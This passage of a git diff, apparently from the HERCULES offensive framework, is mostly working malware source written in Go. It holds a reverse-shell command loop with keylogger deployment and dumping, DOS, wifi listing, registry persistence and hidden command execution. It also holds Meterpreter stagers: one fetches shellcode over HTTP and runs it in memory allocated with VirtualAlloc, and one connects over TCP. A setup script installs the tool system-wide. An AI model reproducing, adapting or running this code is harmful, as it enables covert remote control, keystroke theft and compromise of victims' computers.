:= strings.Split(GLOBAL_COMMAND, "\"") + var DOS_Target string = DOS_Command[1] + if strings.Contains(string(DOS_Target), "http") { + go EGESPLOIT.Dos(DOS_Target) + connect.Write([]byte("\n\n[*] Starting DOS atack..." + "\n\n[*] Sending 1000 request to " + DOS_Target + " !\n\n" + Dir + ">")) + } else { + connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n" + Dir + ">")) + } + } else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") { + EGESPLOIT.Distrackt() + } else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy") { + go EGESPLOIT.Keylogger(&KeyLogs) + connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">"))) + } else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump") { + Dump_Output := string("################## KEYLOGGER DUMP ##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n" + string(Dir) + ">") + connect.Write([]byte(Dump_Output)) + } else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") { + List := EGESPLOIT.WifiList() + connect.Write([]byte(string(List))) + } else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") { + connect.Write([]byte(string(HELP + Dir + ">"))) + } else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") { + go EGESPLOIT.Persistence() + connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) + ">")) + } else { + cmd := exec.Command("cmd", "/C", _Command) + cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} + out, _ := cmd.Output() + Command_Output := string("\n\n" + string(out) + "\n" + string(Dir) + ">") + connect.Write([]byte(Command_Output)) + } + } +} var BANNER string = ` __ ____________ ________ ____ ___________ @@ -130,9 +113,6 @@ var BANNER string = ` ############################ HERCULES REVERSE SHELL ############################ ` - - - var HELP string = ` __ ____________ ________ ____ ___________ diff --git a/SOURCE/Payloads/Meterpreter_Reverse_HTTP_HTTPS.go b/SOURCE/Payloads/Meterpreter_Reverse_HTTP_HTTPS.go index 01e337c..a6b678f 100644 --- a/SOURCE/Payloads/Meterpreter_Reverse_HTTP_HTTPS.go +++ b/SOURCE/Payloads/Meterpreter_Reverse_HTTP_HTTPS.go @@ -4,39 +4,36 @@ import "net/http" import "syscall" import "unsafe" import "io/ioutil" -//import "EGESPLOIT/RSE" - +//import "EGESPLOIT/RSE" -const MEM_COMMIT = 0x1000 +const MEM_COMMIT = 0x1000 const MEM_RESERVE = 0x2000 -const PAGE_AllocateUTE_READWRITE = 0x40 +const PAGE_AllocateUTE_READWRITE = 0x40 var K32 = syscall.NewLazyDLL("kernel32.dll") var VirtualAlloc = K32.NewProc("VirtualAlloc") var Address string = "http://127.0.0.1:8080/" var Checksum string = "102011b7txpl71n" - - func main() { - //RSE.Persistence() - Address += Checksum - Response, err := http.Get(Address) - if err != nil { - main() - } - Shellcode, _ := ioutil.ReadAll(Response.Body) - - Addr, _, err := VirtualAlloc.Call(0, uintptr(len(Shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE) - if Addr == 0 { - main() - } - AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr)) - for i := 0; i < len(Shellcode); i++ { - AddrPtr[i] = Shellcode[i] - } - //RSE.Migrate(Addr, len(Shellcode)) - syscall.Syscall(Addr, 0, 0, 0, 0) + //RSE.Persistence() + Address += Checksum + Response, err := http.Get(Address) + if err != nil { + main() + } + Shellcode, _ := ioutil.ReadAll(Response.Body) + + Addr, _, err := VirtualAlloc.Call(0, uintptr(len(Shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE) + if Addr == 0 { + main() + } + AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr)) + for i := 0; i < len(Shellcode); i++ { + AddrPtr[i] = Shellcode[i] + } + //RSE.Migrate(Addr, len(Shellcode)) + syscall.Syscall(Addr, 0, 0, 0, 0) } diff --git a/SOURCE/Payloads/Meterpreter_Reverse_TCP.go b/SOURCE/Payloads/Meterpreter_Reverse_TCP.go index dc7741b..f264ef3 100644 --- a/SOURCE/Payloads/Meterpreter_Reverse_TCP.go +++ b/SOURCE/Payloads/Meterpreter_Reverse_TCP.go @@ -1,21 +1,19 @@ package main - import "encoding/binary" import "syscall" import "unsafe" + //import "EGESPLOIT/RSE" -const MEM_COMMIT = 0x1000 +const MEM_COMMIT = 0x1000 const MEM_RESERVE = 0x2000 -const PAGE_AllocateUTE_READWRITE = 0x40 - +const PAGE_AllocateUTE_READWRITE = 0x40 var K32 = syscall.NewLazyDLL("kernel32.dll") var VirtualAlloc = K32.NewProc("VirtualAlloc") - -func Allocate(Shellcode uintptr) (uintptr) { +func Allocate(Shellcode uintptr) uintptr { Addr, _, _ := VirtualAlloc.Call(0, Shellcode, MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE) if Addr == 0 { @@ -29,7 +27,7 @@ func main() { var WSA_Data syscall.WSAData syscall.WSAStartup(uint32(0x202), &WSA_Data) Socket, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0) - Socket_Addr := syscall.SockaddrInet4{Port: 5555, Addr: [4]byte{127,0,0,1}} + Socket_Addr := syscall.SockaddrInet4{Port: 5555, Addr: [4]byte{127, 0, 0, 1}} syscall.Connect(Socket, &Socket_Addr) var Length [4]byte WSA_Buffer := syscall.WSABuf{Len: uint32(4), Buf: &Length[0]} diff --git a/Setup.go b/Setup.go index 8f62787..2b71e1b 100644 --- a/Setup.go +++ b/Setup.go @@ -6,185 +6,169 @@ import "runtime" import "github.com/fatih/color" import "os" - - - - func main() { - - - Green := color.New(color.FgGreen) - BoldGreen := Green.Add(color.Bold) - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - Red := color.New(color.FgRed) - BoldRed := Red.Add(color.Bold) - White := color.New(color.FgWhite) - BoldWhite := White.Add(color.Bold) - - color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ") - color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ") - color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ") - color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒") - color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒") - color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░") - color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░") - color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ") - color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") - color.Red(" ░ ") - - color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]") - BoldGreen.Println("+ -- --=[ Ege Balcı ]") - - - - - - Priv := CheckSUDO() - - BoldWhite.Println("\n\n[*] STARTING HERCULES SETUP \n") - - - BoldYellow.Println("[*] Detecting OS...") - - if runtime.GOOS == "linux" { - - - OsVersion, _ := exec.Command("sh", "-c", "uname -a").Output() - BoldYellow.Println("[*] OS Detected : " + string(OsVersion)) - BoldYellow.Println("[*] Setting HERCULES path...") - - - Path, _ := exec.Command("sh", "-c", "pwd").Output() - BoldYellow.Println("[*] HERCULES_PATH="+string(Path)) - _Path := strings.Trim(string(Path), "\n") - var HERCULES_PATH string = string("echo 'export HERCULES_PATH="+_Path+"' >> ~/.bashrc") - exec.Command("sh", "-c", HERCULES_PATH).Run() - exec.Command("sh", "-c", string("export HERCULES_PATH="+string(Path))).Run() - if strings.Contains(string(OsVersion), "Ubuntu") || strings.Contains(string(OsVersion), "kali") { - BoldYellow.Println("[*] Installing golang...") - if Priv == false { - BoldRed.Println("[!] ERROR : Setup needs root privileges") - } - Go := exec.Command("sh", "-c", "sudo apt-get install golang") - Go.Stdout = os.Stdout - Go.Stderr = os.Stderr - Go.Stdin = os.Stdin - Go.Run() - BoldYellow.Println("[*] Installing upx...") - UPX := exec.Command("sh", "-c", "sudo apt-get install upx") - UPX.Stdout = os.Stdout - UPX.Stderr = os.Stderr - UPX.Stdin = os.Stdin - UPX.Run() - BoldYellow.Println("[*] Installing git...") - Git := exec.Command("sh", "-c", "sudo apt-get install git") - Git.Stdout = os.Stdout - Git.Stderr = os.Stderr - Git.Stdin = os.Stdin - Git.Run() - - BoldYellow.Println("[*] Cloning EGESPLOIT Library...") - exec.Command("sh", "-c", "cd src && git clone https://github.com/EgeBalci/EGESPLOIT.git").Run() - exec.Command("sh", "-c", "export GOPATH=$HERCULES_PATH").Run() - BoldYellow.Println("[*] Cloning color Library...") - exec.Command("sh", "-c", "go get github.com/fatih/color").Run() - - exec.Command("sh", "-c", "cd SOURCE && go build HERCULES.go").Run() - - BoldYellow.Println("[*] Createing shoutcut...") - exec.Command("sh", "-c", "sudo cp HERCULES /bin/").Run() - exec.Command("sh", "-c", "sudo chmod 777 /bin/HERCULES").Run() - - }else if strings.Contains(string(OsVersion), "ARCH") || strings.Contains(string(OsVersion), "MANJARO") { - //pacman -S package_name1 - BoldYellow.Println("[*] Installing golang...") - BoldYellow.Println("[*] Installing golang...") - if Priv == false { - BoldRed.Println("[!] ERROR : Setup needs root privileges") - } - Go := exec.Command("sh", "-c", "pacman -S go") - Go.Stdout = os.Stdout - Go.Stderr = os.Stderr - Go.Stdin = os.Stdin - Go.Run() - BoldYellow.Println("[*] Installing upx...") - UPX := exec.Command("sh", "-c", "pacman -S upx") - UPX.Stdout = os.Stdout - UPX.Stderr = os.Stderr - UPX.Stdin = os.Stdin - UPX.Run() - BoldYellow.Println("[*] Installing git...") - Git := exec.Command("sh", "-c", "pacman -S git") - Git.Stdout = os.Stdout - Git.Stderr = os.Stderr - Git.Stdin = os.Stdin - Git.Run() - - BoldYellow.Println("[*] Cloning EGESPLOIT Library...") - exec.Command("sh", "-c", "cd SOURCE && git clone https://github.com/EgeBalci/EGESPLOIT.git").Run() - exec.Command("sh", "-c", "export GOPATH=$HERCULES_PATH").Run() - BoldYellow.Println("[*] Cloning color Library...") - exec.Command("sh", "-c", "go get github.com/fatih/color").Run() - - exec.Command("sh", "-c", "cd SOURCE && go build HERCULES.go").Run() - - BoldYellow.Println("[*] Createing shoutcut...") - exec.Command("sh", "-c", "sudo cp HERCULES /bin/").Run() - exec.Command("sh", "-c", "sudo chmod 777 /bin/HERCULES").Run() - - }else{ - BoldRed.Println("[!] ERROR : HERCULES does not support this OS") - } - - - Stat, Err := CheckValid() - - if Stat == false { - BoldYellow.Println("\n") - BoldRed.Println(Err) - }else{ - BoldGreen.Println("\n\n[+] Setup completed successfully") - exec.Command("sh", "-c", "gnome-terminal").Run() - exec.Command("sh", "-c", "exit").Run() - } - - - }else if runtime.GOOS != "linux" { - BoldRed.Println("[!] ERROR : HERCULES only supports linux distributions") - } + Green := color.New(color.FgGreen) + BoldGreen := Green.Add(color.Bold) + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + Red := color.New(color.FgRed) + BoldRed := Red.Add(color.Bold) + White := color.New(color.FgWhite) + BoldWhite := White.Add(color.Bold) + + color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ") + color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ") + color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ") + color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒") + color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒") + color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░") + color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░") + color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ") + color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") + color.Red(" ░ ") + + color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]") + BoldGreen.Println("+ -- --=[ Ege Balcı ]") + + Priv := CheckSUDO() + + BoldWhite.Println("\n\n[*] STARTING HERCULES SETUP \n") + + BoldYellow.Println("[*] Detecting OS...") + + if runtime.GOOS == "linux" { + + OsVersion, _ := exec.Command("sh", "-c", "uname -a").Output() + BoldYellow.Println("[*] OS Detected : " + string(OsVersion)) + BoldYellow.Println("[*] Setting HERCULES path...") + + Path, _ := exec.Command("sh", "-c", "pwd").Output() + BoldYellow.Println("[*] HERCULES_PATH=" + string(Path)) + _Path := strings.Trim(string(Path), "\n") + var HERCULES_PATH string = string("echo 'export HERCULES_PATH=" + _Path + "' >> ~/.bashrc") + exec.Command("sh", "-c", HERCULES_PATH).Run() + exec.Command("sh", "-c", string("export HERCULES_PATH="+string(Path))).Run() + if strings.Contains(string(OsVersion), "Ubuntu") || strings.Contains(string(OsVersion), "kali") { + BoldYellow.Println("[*] Installing golang...") + if Priv == false { + BoldRed.Println("[!] ERROR : Setup needs root privileges") + } + Go := exec.Command("sh", "-c", "sudo apt-get install golang") + Go.Stdout = os.Stdout + Go.Stderr = os.Stderr + Go.Stdin = os.Stdin + Go.Run() + BoldYellow.Println("[*] Installing upx...") + UPX := exec.Command("sh", "-c", "sudo apt-get install upx") + UPX.Stdout = os.Stdout + UPX.Stderr = os.Stderr + UPX.Stdin = os.Stdin + UPX.Run() + BoldYellow.Println("[*] Installing git...") + Git := exec.Command("sh", "-c", "sudo apt-get install git") + Git.Stdout = os.Stdout + Git.Stderr = os.Stderr + Git.Stdin = os.Stdin + Git.Run() + + BoldYellow.Println("[*] Cloning EGESPLOIT Library...") + exec.Command("sh", "-c", "cd src && git clone https://github.com/EgeBalci/EGESPLOIT.git").Run() + exec.Command("sh", "-c", "export GOPATH=$HERCULES_PATH").Run() + BoldYellow.Println("[*] Cloning color Library...") + exec.Command("sh", "-c", "go get github.com/fatih/color").Run() + + exec.Command("sh", "-c", "cd SOURCE && go build HERCULES.go").Run() + + BoldYellow.Println("[*] Createing shoutcut...") + exec.Command("sh", "-c", "sudo cp HERCULES /bin/").Run() + exec.Command("sh", "-c", "sudo chmod 777 /bin/HERCULES").Run() + + } else if strings.Contains(string(OsVersion), "ARCH") || strings.Contains(string(OsVersion), "MANJARO") { + //pacman -S package_name1 + BoldYellow.Println("[*] Installing golang...") + BoldYellow.Println("[*] Installing golang...") + if Priv == false { + BoldRed.Println("[!] ERROR : Setup needs root privileges") + } + Go := exec.Command("sh", "-c", "pacman -S go") + Go.Stdout = os.Stdout + Go.Stderr = os.Stderr + Go.Stdin = os.Stdin + Go.Run() + BoldYellow.Println("[*] Installing upx...") + UPX := exec.Command("sh", "-c", "pacman -S upx") + UPX.Stdout = os.Stdout + UPX.Stderr = os.Stderr + UPX.Stdin = os.Stdin + UPX.Run() + BoldYellow.Println("[*] Installing git...") + Git := exec.Command("sh", "-c", "pacman -S git") + Git.Stdout = os.Stdout + Git.Stderr = os.Stderr + Git.Stdin = os.Stdin + Git.Run() + + BoldYellow.Println("[*] Cloning EGESPLOIT Library...") + exec.Command("sh", "-c", "cd SOURCE && git clone https://github.com/EgeBalci/EGESPLOIT.git").Run() + exec.Command("sh", "-c", "export GOPATH=$HERCULES_PATH").Run() + BoldYellow.Println("[*] Cloning color Library...") + exec.Command("sh", "-c", "go get github.com/fatih/color").Run() + + exec.Command("sh", "-c", "cd SOURCE && go build HERCULES.go").Run() + + BoldYellow.Println("[*] Createing shoutcut...") + exec.Command("sh", "-c", "sudo cp HERCULES /bin/").Run() + exec.Command("sh", "-c", "sudo chmod 777 /bin/HERCULES").Run() + + } else { + BoldRed.Println("[!] ERROR : HERCULES does not support this OS") + } + + Stat, Err := CheckValid() + + if Stat == false { + BoldYellow.Println("\n") + BoldRed.Println(Err) + } else { + BoldGreen.Println("\n\n[+] Setup completed successfully") + exec.Command("sh", "-c", "gnome-terminal").Run() + exec.Command("sh", "-c", "exit").Run() + } + + } else if runtime.GOOS != "linux" { + BoldRed.Println("[!] ERROR : HERCULES only supports linux distributions") + } } +func CheckValid() (bool, string) { -func CheckValid() (bool, string){ - - OutUPX, _ := exec.Command("sh", "-c", "upx").Output() - if (!strings.Contains(string(OutUPX), "Copyright")) { - return false, "[!] ERROR : upx is not installed" - } + OutUPX, _ := exec.Command("sh", "-c", "upx").Output() + if !strings.Contains(string(OutUPX), "Copyright") { + return false, "[!] ERROR : upx is not installed" + } - OutGO, _ := exec.Command("sh", "-c", "go version").Output() - if (!strings.Contains(string(OutGO), "version")) { - return false, "[!] ERROR : golang is not installed" - } + OutGO, _ := exec.Command("sh", "-c", "go version").Output() + if !strings.Contains(string(OutGO), "version") { + return false, "[!] ERROR : golang is not installed" + } - OutBin, _ := exec.Command("sh", "-c", "cd /bin/ && ls").Output() - if (!strings.Contains(string(OutBin), "HERCULES")) { - return false, "[!] ERROR : Unable to create shoutcut " - } + OutBin, _ := exec.Command("sh", "-c", "cd /bin/ && ls").Output() + if !strings.Contains(string(OutBin), "HERCULES") { + return false, "[!] ERROR : Unable to create shoutcut " + } - return true, "" + return true, "" } -func CheckSUDO() (bool){ +func CheckSUDO() bool { User, _ := exec.Command("sh", "-c", "whoami").Output() if strings.Contains(string(User), "root") { return true - }else { + } else { return false } - + }